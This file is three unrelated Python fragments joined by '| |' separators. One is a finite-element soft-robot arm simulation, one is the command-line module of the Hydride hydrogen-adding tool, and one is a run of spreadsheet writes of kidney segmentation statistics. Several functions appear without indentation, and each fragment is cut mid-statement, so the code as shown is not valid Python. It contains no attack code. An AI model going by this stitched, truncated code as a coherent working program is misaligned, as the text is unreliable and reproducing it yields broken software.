        verts += [-self._obj_center[0], -self._obj_center[1], 0.]
        min_corner_after = np.min(verts, axis=0)
        max_corner_after = np.max(verts, axis=0)
        ### Boundary conditions: Glue vertices spatially
        # Vertices at the top (max z) are pinned via Dirichlet conditions;
        # vertices at the bottom (min z) are only recorded in min_z_nodes.
        self.min_z_nodes = []
        for i in range(vert_num):
            vx, vy, vz = verts[i]
            if abs(vz - min_corner[2]) < 1e-3:
                self.min_z_nodes.append(i)
            if abs(vz - max_corner[2]) < 1e-3:
                deformable.SetDirichletBoundaryCondition(3 * i, vx)
                deformable.SetDirichletBoundaryCondition(3 * i + 1, vy)
                deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
        #Define target points of QTM
        # (QTM = motion-capture marker positions, in meters — first 4 at the tip)
        self.target_points=[
            [0.0214436, 0.005746, 0.],
            [0.0093821, -0.02012, 0.],
            [-0.01569777, -0.01569777, 0.],
            [-0.0201200, 0.0093821, 0.],
            [-0.04312, 0.02828, 0.102],
            [0.0141, -0.0573, 0.102],
            [-0.05231, -0.01909, 0.102],
            [-0.02121, -0.05019, 0.102]
        ]
        # Tip point index that we want to track
        self.target_idx_tip_front = []
        norm=np.linalg.norm(verts-self.target_points[2], axis=1)
        self.target_idx_tip_front.append(int(np.argmin(norm)))
        # NOTE(review): dead nested def, same pattern as target_idx_hex above.
        def target_idx_tip_front():
            return self.target_idx_tip_front
        # All motion marker of the tip
        self.target_idx = []
        for point in self.target_points[:4]:
            norm=np.linalg.norm(verts-point, axis=1)
            self.target_idx.append(int(np.argmin(norm)))
        # NOTE(review): dead nested def; also note it takes `self` although it
        # is a local function, so even if called it would need an argument.
        def target_idx(self):
            return self.target_idx
        # For defining forces on inner surface (just the chamber walls, each of the 4 separate)
        self._inner_faces = [[],[],[],[]]
        faces = get_boundary_face(mesh)
        # Approximately how thick the walls are (inner square walls are a little thicker at 2.27mm)
        wall_width = 2.03e-3
        def belongs_inner_chamber (face_vertices):
            """
            Returns True or False based on whether a face (defined by its vertices) is part of the inner chamber.
            (In default orientation) The inner shape is a rounded square that is rotated in a diagonal fashion. So now we have a diamond shape, the equation for the diamond is |x| + |y| = 10.11mm and as the radius of the whole cylinder is about 22.22mm, we can set everything in between as the inner surface (assuming we centered the object in the xy-plane).
            At the bottom there is some intrusions, the bottom section is about 6.93mm thick, so we disregard that part when applying pressure.
            """
            res = (
                # Should exclude outer wall
                (np.linalg.norm(face_vertices[:,:2], axis=1) < 22.22e-3 - wall_width/2).all()
                # Should exclude inner wall
                and (np.sum(abs(face_vertices[:,:2]), axis=1) > 10.11e-3 + wall_width/2).all()
                # Exclude upper and lower surfaces
                and (abs(face_vertices[:,2] - max_corner[2]) > 1e-3).any()
                and (abs(face_vertices[:,2] - min_corner[2]) > 6.93e-3 - wall_width/2).all()
            )
            return res
        for f in faces:
            face_vertices = verts.take(f, axis=0)
            if belongs_inner_chamber(face_vertices):
                # Check which chamber it belongs to:
                # Conventional quadrants: 0 (+; +), 1 (−; +), 2 (−; −), and 3 (+; −)
                # If a face is inbetween, it just goes somewhere, though we don't care as it isn't part of the chambers.
                if (np.prod(face_vertices[:,:2], axis=1) > 0).all():
                    if (face_vertices[:,0] > 0).any():
                        self._inner_faces[0].append(f)
                    else:
                        self._inner_faces[2].append(f)
                else:
                    if (face_vertices[:,0] > 0).any():
                        self._inner_faces[3].append(f)
                    else:
                        self._inner_faces[1].append(f)
        # State-based forces.
        deformable.AddStateForce('gravity', state_force_parameters)
        if material == 'none':
            # For corotated material
            deformable.AddPdEnergy('corotated', [2 * mu,], [])
            deformable.AddPdEnergy('volume', [la,], [])
        # Initial state
        dofs = deformable.dofs()
        q0 = np.copy(verts)
        q0 = q0.ravel()
        v0 = ndarray(np.zeros(dofs)).ravel()
        f_ext = ndarray(np.zeros(dofs)).ravel()
        # Data members.
        self._deformable = deformable
        self._q0 = q0
        self._v0 = v0
        self._f_ext = f_ext
        self._youngs_modulus = youngs_modulus
        self._poissons_ratio = poissons_ratio
        self._state_force_parameters = state_force_parameters
        self._stepwise_loss = False
        # Random linear-loss gradients used by _loss_and_grad (seeded above).
        self.__loss_q_grad = np.random.normal(size=dofs)
        self.__loss_v_grad = np.random.normal(size=dofs)
        # Renderer samples per pixel.
        self.__spp = options['spp'] if 'spp' in options else 4
        self._mesh_type = mesh_type
    def _display_mesh(self, mesh_file, file_name, qs_real, i):
        """Render one frame of the arm plus the real motion-capture markers.

        Args:
            mesh_file: path to a mesh file, or a (tet_path, hex_path) tuple.
            file_name: output image path for the renderer.
            qs_real: array of real marker positions; frame i, markers [:4] are drawn.
            i: frame index into qs_real.
        """
        # Size of the bounding box: [-0.06, -0.05, 0] - [0.06, 0.05, 0.14]
        options = {
            'file_name': file_name,
            'light_map': 'uffizi-large.exr',
            'sample': self.__spp,
            'max_depth': 2,
            'camera_pos': (0.8, -0.8, 1.1), # Position of camera
            'camera_lookat': (0, 0, .28) # Position that camera looks at
        }
        renderer = PbrtRenderer(options)
        # Scale up 4x and recentre the arm over the ground plane.
        transforms = [
            ('s', 4),
            ('t', [-self._obj_center[0], -self._obj_center[1], 0.1])
        ]
        # NOTE(review): when mesh_file is a tuple, the first branch always wins,
        # so a (tet, hex) tuple is rendered as tet even if self._mesh_type == 'hex'
        # — the `isinstance(..., tuple)` test in the elif can never fire. Confirm
        # whether tuple input was meant to follow self._mesh_type instead.
        if isinstance(mesh_file, tuple) or self._mesh_type == 'tet':
            mesh = TetMesh3d()
            mesh.Initialize(mesh_file[0] if isinstance(mesh_file, tuple) else mesh_file)
            renderer.add_tri_mesh(
                mesh,
                color='0096c7',
                transforms=transforms,
                render_tet_edge=True,
            )
        elif isinstance(mesh_file, tuple) or self._mesh_type == 'hex':
            mesh = HexMesh3d()
            mesh.Initialize(mesh_file[1] if isinstance(mesh_file, tuple) else mesh_file)
            renderer.add_hex_mesh(
                mesh,
                transforms=transforms,
                render_voxel_edge=True,
                color='0096c7'
            )
        # motion markers at the tip
        for q_real in qs_real[i,:4]:
            renderer.add_shape_mesh({
                'name': 'sphere',
                'center': q_real,
                'radius': 0.004
            },
            color='d60000',
            transforms=transforms
            )
        renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',texture_img='chkbd_24_0.7', transforms=[('s', 2)])
        renderer.render()
def _loss_and_grad(self, q, v):
loss = q.dot(self.__loss_q_grad) + v.dot(self.__loss_v_grad)
return loss, np.copy(self.__loss_q_grad), np.copy(self.__loss_v_grad)
def apply_inner_pressure(self, p, q=None, chambers=[0,1,2,3]):
"""
Applies some pressure on all nodes on the inner surface of specific chambers.
Arguments:
p (float) : pressure difference uniformly in the cube, difference with pressure outside the cube
q (ndarray with shape [3*N]) : (optional) node positions at this timestep
chambers (list) : (optional) chambers where pressure should be applied input as a list of integers.
Returns:
f (ndarray with shape [3*N]) : external forces on all nodes for this one timestep.
"""
f_ext = np.zeros_like(self._f_ext)
f_ext_count = np.zeros_like(f_ext, dtype=int) # We apply forces multiple times on same vertex, we take the average in the end
verts = q.reshape(-1, 3) if q is not None else self._q0.reshape(-1, 3)
chamber_faces = np.concatenate([self._inner_faces[i] for i in chambers])
for face in chamber_faces:
# Find surface normal (same for tet and hex)
v0, v1, v2 = verts[face[0]], verts[face[1]], verts[face[2]]
# Cross product is the unnormalized normal vector (of which the norm is the surface area of the parallelogram spanned by the two vectors)
cross_prod = np.cross((v1-v0), (v2-v0))
#face_centers.append((v0+v1+v2)/3)
#face_normals.append(-cross_prod)
if self._mesh_type == 'tet':
# Triangle area
area_factor = 0.5
elif self._mesh_type == 'hex':
# Square area
area_factor = 1
f_pressure = -p * area_factor * cross_prod
for vertex_idx in face:
# Apply forces in x, y and z directions (3 dimensional)
for d in | |
# This source code is part of the Hydride package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
__name__ = "hydride"
__author__ = "<NAME>"
from os.path import splitext
import sys
import argparse
import warnings
import numpy as np
import biotite.structure as struc
import biotite.structure.io.pdb as pdb
import biotite.structure.io.pdbx as pdbx
import biotite.structure.io.mmtf as mmtf
import biotite.structure.io.mol as mol
from .add import add_hydrogen
from. charge import estimate_amino_acid_charges
from .fragments import FragmentLibrary
from .names import AtomNameLibrary
from .relax import relax_hydrogen
class UserInputError(Exception):
    """Raised for invalid command-line input; reported to the user as a plain
    error message (no traceback) unless --verbose is given."""
    pass
def main(args=None):
    """Entry point for the 'hydride' CLI.

    Builds the argument parser, parses *args* (or sys.argv when None) and
    delegates to run(). UserInputError is reported as a plain message and
    exits with status 1 (re-raised instead when --verbose is set); any other
    exception propagates with its traceback.
    """
    parser = argparse.ArgumentParser(
        description="This program adds hydrogen atoms to molecular "
                    "structures where these are missing.\n"
                    "For more information, please visit "
                    "https://hydride.biotite-python.org/.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )
    parser.add_argument(
        "--infile", "-i", metavar="FILE",
        help="The path to the input structure file containing the model "
             "without hydrogen atoms. "
             # Fixed: previously said STDOUT; the input is read from STDIN.
             "If omitted, the file is read from STDIN."
    )
    parser.add_argument(
        "--outfile", "-o", metavar="FILE",
        help="The path to the output structure file where the model "
             "with added hydrogen atoms should be written to. "
             "If omitted, the file is written to STDOUT. "
             # Fixed grammar: 'removed the model' -> 'removed from the model'.
             "Any existing hydrogen atoms will be removed from the model."
    )
    parser.add_argument(
        "--informat", "-I",
        choices=["pdb", "pdbx", "cif", "mmtf", "sdf", "mol"],
        help="The file format of the input file. "
             "Must be specified if input file is read from STDIN. "
             "If omitted, the file format is guessed from the suffix "
             "of the file."
    )
    parser.add_argument(
        "--outformat", "-O",
        choices=["pdb", "pdbx", "cif", "mmtf", "mol"],
        help="The file format of the output file. "
             # Fixed missing space after 'STDOUT.' in the concatenated string.
             "Must be specified if output file is written to STDOUT. "
             "If omitted, the file format is guessed from the suffix "
             "of the file."
    )
    parser.add_argument(
        "--verbose", "-v", action="store_true",
        help="Verbose display of errors."
    )
    parser.add_argument(
        "--no-relax", action="store_true",
        help="Omit the relaxation step. "
             "Note bond lengths and angles will still be correct. "
             "However clashes or electrostatically unfavorable "
             "conformations will not be resolved."
    )
    parser.add_argument(
        "--iterations", "-n", type=int, metavar="NUMBER",
        help="The maximum number of relaxation iterations. "
             "The runtime of the relaxation scales approximately "
             "linear with this value, if the relaxation does not "
             "terminate before. "
             "By default, the relaxation runs until a local optimum "
             "has been reached."
    )
    parser.add_argument(
        "--angle-increment", "-a", type=float, metavar="NUMBER", default=10.0,
        help="The angle in degrees that a freely rotatable bond is rotated "
             # Fixed missing space after 'step.' in the concatenated string.
             "in each relaxation step. "
             "Lower values increase the accuracy of hydrogen positioning, "
             "but increase the required number of steps until an optimum "
             "is found."
    )
    parser.add_argument(
        "--fragments", "-f", metavar="FILE", action="append",
        help="Additional structure file to containing fragments for the "
             "fragment library. "
             # Fixed grammar: 'used supply' -> 'used to supply'.
             "This can be used to supply fragments for molecules with uncommon "
             "groups, if the standard fragment library does not contain such "
             "fragments, yet. "
             "May be supplied multiple times."
    )
    parser.add_argument(
        "--fragformat", "-F",
        choices=["pdb", "pdbx", "cif", "mmtf", "sdf", "mol"],
        help="The file format of the additional structure files. "
             "If omitted, the file format is guessed from the suffix "
             "of the file."
    )
    parser.add_argument(
        "--ignore", "-g", metavar="RESIDUE", action="append", nargs=2,
        help="No hydrogen atoms are added to the specified residue. "
             "The format is '{chain} {residue}', e.g. 'A 123'. "
             "May be supplied multiple times, if multiple residues should be "
             "ignored."
    )
    parser.add_argument(
        "--model", "-m", type=int, metavar="NUMBER", default=1,
        help="The model number, if the input structure file contains multiple "
             "models."
    )
    parser.add_argument(
        "--charges", "-c", type=float, metavar="PH",
        help="Recalculate the charges of atoms in amino acids based on the "
             "given pH value. "
             "This estimation does not take the surrounding amino acids into "
             "account."
    )
    parser.add_argument(
        "--pbc", "-p", action="store_true",
        help="Set hydrogen addition and relaxation aware to periodic boundary "
             "conditions. "
             "The box is read from the input structure file."
    )
    args = parser.parse_args(args=args)

    try:
        run(args)
    except UserInputError as e:
        print(f"Error: {e}", file=sys.stderr)
        if args.verbose:
            raise
        else:
            sys.exit(1)
    except Exception as e:
        # Fixed typo: 'occured' -> 'occurred'.
        print("An unexpected error occurred:\n", file=sys.stderr)
        raise
def run(args):
    """Execute the hydrogen-addition pipeline for parsed CLI arguments.

    Loads the fragment/name libraries (plus any user fragments), reads the
    input model, optionally recalculates amino-acid charges, adds hydrogen
    atoms (respecting --ignore and --pbc), optionally relaxes them, and
    writes the result.

    Raises:
        UserInputError: for any problem attributable to the user's input.
    """
    frag_library = FragmentLibrary.standard_library()
    name_library = AtomNameLibrary.standard_library()
    if args.fragments is not None:
        for frag_path in args.fragments:
            try:
                model = read_structure(frag_path, args.fragformat, 1)
            except UserInputError:
                raise
            except PermissionError:
                raise UserInputError(
                    f"Missing file permission for reading '{frag_path}'"
                )
            except FileNotFoundError:
                # Bug fix: these messages previously reported args.infile
                # instead of the fragment file that actually failed.
                raise UserInputError(
                    f"Input file '{frag_path}' cannot be found"
                )
            # Bug fix: was a bare 'except:', which also converted
            # SystemExit/KeyboardInterrupt into UserInputError.
            except Exception:
                raise UserInputError(
                    f"Input file '{frag_path}' contains invalid data"
                )
            frag_library.add_molecule(model)
            name_library.add_molecule(model)

    try:
        model = read_structure(args.infile, args.informat, args.model)
    except UserInputError:
        raise
    except PermissionError:
        raise UserInputError(
            f"Missing file permission for reading '{args.infile}'"
        )
    except FileNotFoundError:
        raise UserInputError(
            f"Input file '{args.infile}' cannot be found"
        )
    except Exception:
        raise UserInputError(
            f"Input file '{args.infile}' contains invalid data"
        )

    # Hydride adds all hydrogens itself; strip any that are already present.
    heavy_mask = (model.element != "H")
    if not heavy_mask.all():
        warnings.warn("Existing hydrogen atoms were removed")
        model = model[heavy_mask]

    # Bug fix: 'if args.charges:' silently ignored a requested pH of 0.0.
    if args.charges is not None:
        aa_mask = struc.filter_amino_acids(model)
        charges = estimate_amino_acid_charges(model, args.charges)
        model.charge[aa_mask] = charges[aa_mask]

    # Atoms in ignored residues are masked out of hydrogen addition.
    input_mask = np.ones(model.array_length(), dtype=bool)
    if args.ignore is not None:
        for chain_id, res_id in args.ignore:
            res_id = int(res_id)
            removal_mask = (model.chain_id == chain_id) & \
                           (model.res_id == res_id)
            if not removal_mask.any():
                raise UserInputError(
                    f"Cannot find '{chain_id} {res_id}' "
                    "in the input structure"
                )
            input_mask &= ~removal_mask

    if args.pbc:
        if model.box is None:
            raise UserInputError(
                "The input structure file does not provide box vectors "
                "required for handling periodic boundary conditions"
            )
        # NOTE(review): True presumably tells add_hydrogen/relax_hydrogen to
        # take the box from the model itself — confirm against their API.
        box = True
    else:
        box = None

    model, _ = add_hydrogen(
        model, input_mask, frag_library, name_library, box
    )

    if not args.no_relax:
        if args.iterations is not None and args.iterations < 0:
            raise UserInputError("The number of iterations must be positive")
        model.coord = relax_hydrogen(
            model, args.iterations,
            angle_increment=np.deg2rad(args.angle_increment),
            box=box
        )

    try:
        write_structure(args.outfile, args.outformat, model)
    except UserInputError:
        raise
    except PermissionError:
        raise UserInputError(
            f"Missing file permission for writing '{args.outfile}'"
        )
def _check_model_number(model_number, model_count):
    # Shared range check: each format reports its model count through a
    # different API, but the user-facing error message must stay consistent.
    if model_number > model_count:
        raise UserInputError(
            f"Model number {model_number} is out of range "
            f"for the input structure with {model_count} models"
        )


def read_structure(path, format, model_number):
    """
    Read a single model from a structure file.

    :param path: path of the input file, or None to read from STDIN
    :param format: one of 'pdb', 'pdbx'/'cif', 'mmtf' or 'mol'/'sdf';
        None to guess the format from the file suffix (requires a path)
    :param model_number: 1-based index of the model to load
    :return: the structure model with charges and associated bonds
    :raises UserInputError: if the format is unknown or cannot be
        determined, or if the model number is out of range
    """
    if format is None:
        if path is None:
            raise UserInputError(
                "The input file format must be given, "
                "if the input file is read from STDIN"
            )
        format = guess_format(path)
    if model_number < 1:
        raise UserInputError("Model number must be positive")
    if path is None:
        path = sys.stdin
    if format == "pdb":
        pdb_file = pdb.PDBFile.read(path)
        _check_model_number(model_number, pdb.get_model_count(pdb_file))
        model = pdb.get_structure(
            pdb_file, model=model_number, extra_fields=["charge"]
        )
        # PDB files carry no bond records -> infer bonds from residue names
        model.bonds = struc.connect_via_residue_names(model)
    elif format == "pdbx" or format == "cif":
        pdbx_file = pdbx.PDBxFile.read(path)
        _check_model_number(model_number, pdbx.get_model_count(pdbx_file))
        model = pdbx.get_structure(
            pdbx_file, model=model_number, extra_fields=["charge"]
        )
        model.bonds = struc.connect_via_residue_names(model)
    elif format == "mmtf":
        if path == sys.stdin:
            # MMTF is a binary format -> read from the raw byte stream
            mmtf_file = mmtf.MMTFFile.read(sys.stdin.buffer)
        else:
            mmtf_file = mmtf.MMTFFile.read(path)
        _check_model_number(model_number, mmtf.get_model_count(mmtf_file))
        model = mmtf.get_structure(
            mmtf_file, model=model_number, include_bonds=True,
            extra_fields=["charge"]
        )
        if model.bonds.get_bond_count() == 0:
            # No bonds were stored in MMTF file
            # -> Predict bonds
            model.bonds = struc.connect_via_residue_names(model)
    elif format == "mol" or format == "sdf":
        mol_file = mol.MOLFile.read(path)
        # MOL/SDF files hold exactly one model
        _check_model_number(model_number, 1)
        model = mol_file.get_structure()
        # MOL files carry no residue information
        # -> use the molecule name from the header line instead
        model.res_name[:] = mol_file.lines[0].strip()
    else:
        raise UserInputError(f"Unknown file format '{format}'")
    return model
def write_structure(path, format, model):
    """
    Write a structure model to a file.

    :param path: path of the output file, or None to write to STDOUT
    :param format: one of 'pdb', 'pdbx'/'cif', 'mmtf' or 'mol'/'sdf';
        None to guess the format from the file suffix (requires a path)
    :param model: the structure model to write
    :raises UserInputError: if the format is unknown or cannot be
        determined
    """
    if format is None:
        if path is None:
            raise UserInputError(
                "The output file format must be given, "
                "if the output written to STDOUT"
            )
        format = guess_format(path)
    destination = sys.stdout if path is None else path
    if format == "pdb":
        out_file = pdb.PDBFile()
        pdb.set_structure(out_file, model)
        out_file.write(destination)
    elif format in ("pdbx", "cif"):
        out_file = pdbx.PDBxFile()
        pdbx.set_structure(out_file, model, data_block="STRUCTURE")
        out_file.write(destination)
    elif format == "mmtf":
        out_file = mmtf.MMTFFile()
        mmtf.set_structure(out_file, model)
        if destination == sys.stdout:
            # MMTF is a binary format -> write to the raw byte stream
            out_file.write(sys.stdout.buffer)
        else:
            out_file.write(destination)
    elif format in ("mol", "sdf"):
        out_file = mol.MOLFile()
        out_file.set_structure(model)
        out_file.set_header(model.res_name[0])
        out_file.write(destination)
    else:
        raise UserInputError(f"Unknown file format '{format}'")
def guess_format(path):
suffix = splitext(path)[-1].lower()
if suffix in [".pdb"]:
return "pdb"
elif suffix in [".pdbx", ".cif", ".mmcif"]:
return "pdbx"
elif suffix in [".mmtf"]:
return "mmtf"
elif suffix in [".mol", ".sdf"]:
return "mol"
else:
raise UserInputError(f"Unknown | |
1
kidney_sheet.write(kidney_row,0,"median all kidney img params")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_med)
kidney_sheet.write(kidney_row,3,kidney_dices_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean all kidney img params")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev all kidney img params")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_min)
kidney_sheet.write(kidney_row,3,kidney_dices_in_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_max)
kidney_sheet.write(kidney_row,3,kidney_dices_in_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_med)
kidney_sheet.write(kidney_row,3,kidney_dices_in_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_in_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_in_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_min)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_max)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_med)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_min)
kidney_sheet.write(kidney_row,3,kidney_dices_F_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_max)
kidney_sheet.write(kidney_row,3,kidney_dices_F_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_med)
kidney_sheet.write(kidney_row,3,kidney_dices_F_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_F_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_F_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_min)
kidney_sheet.write(kidney_row,3,kidney_dices_W_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_max)
kidney_sheet.write(kidney_row,3,kidney_dices_W_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_med)
kidney_sheet.write(kidney_row,3,kidney_dices_W_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_W_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_W_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_min)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_max)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_med)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_min)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_max)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_med)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_stdev)
